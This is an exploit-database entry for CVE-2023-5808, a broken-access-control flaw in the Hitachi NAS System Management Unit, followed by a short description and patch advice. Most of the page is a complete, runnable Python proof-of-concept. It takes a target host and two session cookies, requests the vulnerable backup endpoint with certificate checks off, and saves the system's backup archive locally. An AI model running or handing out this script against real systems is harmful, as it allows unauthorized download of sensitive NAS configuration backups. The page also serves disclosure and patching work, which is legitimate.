header-logo
Suggest Exploit
vendor:
Hitachi NAS (HNAS) System Management Unit (SMU)
by:
Arslan Masood
5.1
CVSS
MEDIUM
Insecure Direct Object Reference (IDOR)
862
CWE
Product Name: Hitachi NAS (HNAS) System Management Unit (SMU)
Affected Version From: < 14.8.7825.01
Affected Version To: Unknown
Patch Exists: YES
Related CWE: CVE-2023-5808
CPE: a:hitachi:hitachi_nas
Metasploit:
Other Scripts: https://www.infosecmatter.com/nessus-plugin-library/?id=86001https://www.infosecmatter.com/nessus-plugin-library/?id=86601https://www.infosecmatter.com/nessus-plugin-library/?id=86270
Platforms Tested:
2023

Hitachi NAS (HNAS) System Management Unit (SMU) Backup & Restore IDOR Vulnerability

The vulnerability allows an attacker to download arbitrary files from the Hitachi NAS (HNAS) System Management Unit (SMU) due to improper access controls. This vulnerability has been assigned CVE-2023-5808. An exploit script has been created by Arslan Masood (@arszilla) to demonstrate the issue. The affected version is < 14.8.7825.01, and the exploit has been tested on version 13.9.7021.04. By manipulating the JSESSIONID and JSESSIONIDSSO cookies, an attacker can download sensitive files from the system.

Mitigation:

To mitigate this vulnerability, it is recommended to update the Hitachi NAS (HNAS) System Management Unit (SMU) to version 14.8.7825.01 or later. Additionally, restrict access to the SMU interface and ensure proper session management to prevent unauthorized file downloads.
Source

Exploit-DB raw data:

#!/usr/bin/python3
#
# Title:            Hitachi NAS (HNAS) System Management Unit (SMU) Backup & Restore IDOR Vulnerability 
# CVE:              CVE-2023-5808
# Date:             2023-12-13
# Exploit Author:   Arslan Masood (@arszilla)
# Vendor:           https://www.hitachivantara.com/
# Version:          < 14.8.7825.01
# Tested On:        13.9.7021.04        

import argparse
from datetime import datetime
from os import getcwd

import requests

parser = argparse.ArgumentParser(
    description="CVE-2023-5808 PoC",
    usage="./CVE-2023-5808.py --host <Hostname/FQDN/IP> --id <JSESSIONID> --sso <JSESSIONIDSSO>"
    )

# Create --host argument:
parser.add_argument(
    "--host",
    required=True,
    type=str,
    help="Hostname/FQDN/IP Address. Provide the port, if necessary, i.e. 127.0.0.1:8443, example.com:8443"
    )

# Create --id argument:
parser.add_argument(
    "--id",
    required=True,
    type=str,
    help="JSESSIONID cookie value"
    )

# Create --sso argument:
parser.add_argument(
    "--sso",
    required=True,
    type=str,
    help="JSESSIONIDSSO cookie value"
    )

args = parser.parse_args()

def download_file(hostname, jsessionid, jsessionidsso):
    # Set the filename:
    filename = f"smu_backup-{datetime.now().strftime('%Y-%m-%d_%H%M')}.zip"

    # Vulnerable SMU URL:
    smu_url = f"https://{hostname}/mgr/app/template/simple%2CBackupSmuScreen.vm/password/"

    # GET request cookies
    smu_cookies = {
        "JSESSIONID":       jsessionid,
        "JSESSIONIDSSO":    jsessionidsso
        }

    # GET request headers:
    smu_headers = {
        "User-Agent":                   "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0",
        "Accept":                       "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
        "Accept-Language":              "en-US,en;q=0.5",
        "Accept-Encoding":              "gzip, deflate",
        "Dnt":                          "1",
        "Referer":                      f"https://{hostname}/mgr/app/action/admin.SmuBackupRestoreAction/eventsubmit_doperform/ignored",
        "Upgrade-Insecure-Requests":    "1",
        "Sec-Fetch-Dest":               "document",
        "Sec-Fetch-Mode":               "navigate",
        "Sec-Fetch-Site":               "same-origin",
        "Sec-Fetch-User":               "?1",
        "Te":                           "trailers",
        "Connection":                   "close"
        }

    # Send the request:
    with requests.get(smu_url, headers=smu_headers, cookies=smu_cookies, stream=True, verify=False) as file_download:
        with open(filename, 'wb') as backup_archive:
            # Write the zip file to the CWD:
            backup_archive.write(file_download.content)

    print(f"{filename} has been downloaded to {getcwd()}")

if __name__ == "__main__":
    download_file(args.host, args.id, args.sso)

Navigation

Suggest Exploit

Services By CQR